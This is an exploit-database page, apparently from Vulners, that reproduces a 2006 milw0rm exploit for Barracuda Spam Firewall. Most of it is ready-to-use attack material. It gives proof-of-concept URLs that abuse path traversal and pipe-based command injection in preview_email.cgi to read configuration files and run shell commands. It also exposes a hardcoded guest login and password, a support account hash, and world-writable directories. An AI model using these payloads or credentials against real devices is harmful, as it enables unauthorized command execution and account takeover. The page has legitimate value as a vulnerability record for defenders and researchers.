Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Barracuda Spam Firewall <= 3.3.03.053 Remote Code Execution (extra)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 12 Views

Barracuda Spam Firewall <= 3.3.03.053 Remote Code Executio

Code

                                                Title: Barracuda Arbitrary File Disclosure + Command Execution
Severity: High (Sensitive Information Disclosure)
Date: 01 August 2006
Version Affected: Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053
Discovered by: Greg Sinclair
Credits: Matthew Hall
Update: 07 August 2006
Updated by: PATz
 
####################################################################
 
Proof of Concept:
https://&#60;deviceIP&#62;/cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp
https://&#60;deviceIP&#62;/cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/|
 
 
####################################################################
 
#using |unix| for command execution:
 
https://&#60;deviceIP&#62;/cgi-bin/preview_email.cgi?file=/mail/mlog/|uname%20-a|

#admin login/pass vuln
 
https://&#60;deviceIP&#62;/cgi-bin/preview_email.cgi?file=/mail/mlog|cat%20update_admin_passwd.pl|
https://&#60;deviceIP&#62;/cgi-bin/preview_email.cgi?file=/mail/mlog/../bin/update_admin_passwd.pl
 
eg.

#`/home/emailswitch/code/firmware/current/bin/updateUser.pl guest phteam99 2&#62;&1`;
login: guest pass: phteam99

some folder are accessible via http without permission
https://&#60;deviceIP&#62;/Translators/
https://&#60;deviceIP&#62;/images/
https://&#60;deviceIP&#62;/locale
https://&#60;deviceIP&#62;/plugins
https://&#60;deviceIP&#62;/help
 
#stuff in do_install
 
/usr/sbin/useradd support -s /home/emailswitch/code/firmware/current/bin/request_support.pl -p swUpHFjf1MUiM
 
## Create backup tmp dir

/bin/mkdir -p /mail/tmp/backup/
chmod -R 777 /mail/tmp/
 
## Create smb backup mount point
/bin/mkdir -p /mnt/smb/
chmod 777 /mnt/smb/
 
.................................
Greetz to all noypi and phteam ^^,
.............eof.................

# milw0rm.com [2006-08-08]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
barracudaspam firewallremote code executionfile disclosurecommand executionvulnerabilitysecurity breachinformation disclosuregreg sinclairmatthew hallexploit
12